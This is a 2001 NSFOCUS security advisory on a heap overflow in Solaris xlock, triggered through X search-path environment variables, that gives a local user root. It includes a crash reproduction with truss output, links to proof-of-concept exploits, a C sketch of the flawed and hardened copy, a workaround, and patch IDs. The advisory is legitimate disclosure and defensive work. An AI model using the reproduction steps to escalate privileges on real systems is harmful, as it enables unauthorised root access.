Date: Fri, 10 Aug 2001 16:49:42 +0800
From: Nsfocus Security Team <[email protected]>
To: "[email protected]" <[email protected]>
Subject: NSFOCUS SA2001-05 : Solaris Xlock Heap Overflow Vulnerability
NSFOCUS Security Advisory(SA2001-05)
Topic: Solaris Xlock Heap Overflow Vulnerability
Release Date: 2001-08-10
CVE CAN ID : CAN-2001-0652
BUGTRAQ ID : 3160
Affected system:
================
Sun Solaris 2.6 (SPARC/x86)
Sun Solaris 7 (SPARC/x86)
Sun Solaris 8 (SPARC/x86)
Impact:
=========
NSFOCUS Security Team has found a heap buffer overflow vulnerability in the
xlock program shipped with Solaris, triggered when it handles some environment
variables. Exploiting it would allow a local attacker to obtain root privilege.
Description:
============
Xlock is a screen-locking tool of Solaris OpenView. It locks the X server until
a password is entered. It is installed suid root by default.
It does not correctly check boundaries when handling some environment
variables. As a result, an attacker could overwrite the boundary tags of
dynamic memory in the heap area and run arbitrary code as root with carefully
constructed overflow data.
The problem lies in two environment variables: "XFILESEARCHPATH" and
"XUSERFILESEARCHPATH". Xlock calls malloc() to allocate 1024 bytes of memory and
saves the environment variable value in this dynamic memory, but it does not
check the length of the environment variable when copying. If either of these
two environment variables is set to a string longer than 1024 bytes, a heap
overflow might occur. Adjacent dynamic memory boundary tags could be
overwritten, and a segmentation fault would occur the next time malloc() is
called.
With carefully formed overflow data, some special "features" of the libc
malloc()/free() implementation could be used to rewrite arbitrary memory, such
as a saved return address, a function pointer or other important data.
Exploiting this vulnerability successfully would give an attacker root privilege.
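Added example (not part of the original advisory, and not xlock or Xt source
code): a C sketch of the unchecked copy into a 1024-byte heap buffer described
above, next to a bounds-checked form. The function names and the set-uid check
are assumptions made for illustration.

```c
/* Added illustration: not xlock or libXt source; all names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PATH_BUF_SIZE 1024 /* allocation size stated in the advisory */

/* The pattern the advisory describes, kept for contrast and never called:
 * a fixed heap buffer filled with no length check. */
char *load_path_unchecked(const char *value)
{
    char *buf = malloc(PATH_BUF_SIZE);
    if (buf != NULL)
        strcpy(buf, value); /* overruns buf once strlen(value) >= 1024 */
    return buf;
}

/* Hardened form: measure first and refuse a value that does not fit,
 * terminator included, instead of silently truncating a file path. */
char *load_path_checked(const char *value)
{
    size_t len;
    char *buf;

    if (value == NULL || (len = strlen(value)) >= PATH_BUF_SIZE)
        return NULL;
    if ((buf = malloc(PATH_BUF_SIZE)) == NULL)
        return NULL;
    memcpy(buf, value, len + 1);
    return buf;
}

/* A set-uid program should additionally ignore user-supplied search
 * paths while its real and effective uids differ. */
char *search_path_from_env(const char *name)
{
    if (getuid() != geteuid())
        return NULL;
    return load_path_checked(getenv(name));
}

int main(void)
{
    char value[1029]; /* constructed input, same length the advisory's test uses */
    memset(value, 'A', 1028);
    value[1028] = '\0';
    printf("1028-byte value accepted: %s\n", load_path_checked(value) ? "yes" : "no");
    return 0;
}
```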
Exploit:
==========
bash-2.03$ uname -a
SunOS sun8 5.8 Generic sun4u sparc SUNW,Ultra-5_10
bash-2.03$ cp /usr/openwin/bin/xlock /tmp/xlock
bash-2.03$ export XFILESEARCHPATH=`perl -e 'print "A"x1028'`
bash-2.03$ /tmp/xlock
Segmentation Fault
bash-2.03$ truss -u libc:malloc,free /tmp/xlock
<...snip...>
<- libc:malloc() = 0x1135d0
-> libc:malloc(0x400, 0xffbefa8d, 0xffffffff, 0x1b648)
<- libc:malloc() = 0x1139d0
open("AAAAAAA...AAAAAAAAAAAAAAA", O_RDONLY) Err#78 ENAMETOOLONG
-> libc:free(0x1139d0, 0x0, 0xff31c000, 0x1b648)
<- libc:free() = 0
-> libc:malloc(0x400, 0x12, 0x0, 0x10ed49)
<- libc:malloc() = 0x1139d0
open("/export/home/test/XLock", O_RDONLY) Err#2 ENOENT
-> libc:free(0x1139d0, 0x0, 0xff31c000, 0x7efefeff)
<- libc:free() = 0
-> libc:malloc(0x3, 0x3073b, 0xffffffff, 0x3a300000)
<- libc:malloc() = 0x1135e0
Incurred fault #6, FLTBOUNDS %pc = 0xFF0C0F4C
siginfo: SIGSEGV SEGV_MAPERR addr=0x41527F18
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41527F18
*** process killed ***
Proof of concept code for this issue will be available at:
http://www.nsfocus.com/proof/sol_sparc_xlockex.c
http://www.nsfocus.com/proof/sol_x86_xlockex.c
Workaround:
===================
Drop the suid root attribute of xlock:
# chmod a-s /usr/openwin/bin/xlock
Vendor Status:
==============
2001.6.11  We informed Sun of this problem.
2001.6.14  Sun replied that the problem had been reproduced and they
           had started to develop relevant patches.
2001.8.8   Sun informed us that the development of patches had finished and
           would be released at the end of the month.
2001.8.9   Sun provided us with IDs of the patches to be released.
Sun's patches to be released for this vulnerability:
               SPARC        x86
               ---------    ---------
Solaris 8      108652-38    108653-33
Solaris 7      108376-30    108377-26
Solaris 2.6    105633-60    106248-45
Security patches of Sun Inc. are available at:
http://sunsolve.sun.com/securitypatch
Additional Information:
========================
The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2001-0652 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems. Candidates
may change significantly before they become official CVE entries.
DISCLAIMER:
===========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.
Copyright 1999-2001 NSFOCUS. All Rights Reserved. Terms of use.
NSFOCUS Security Team <[email protected]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)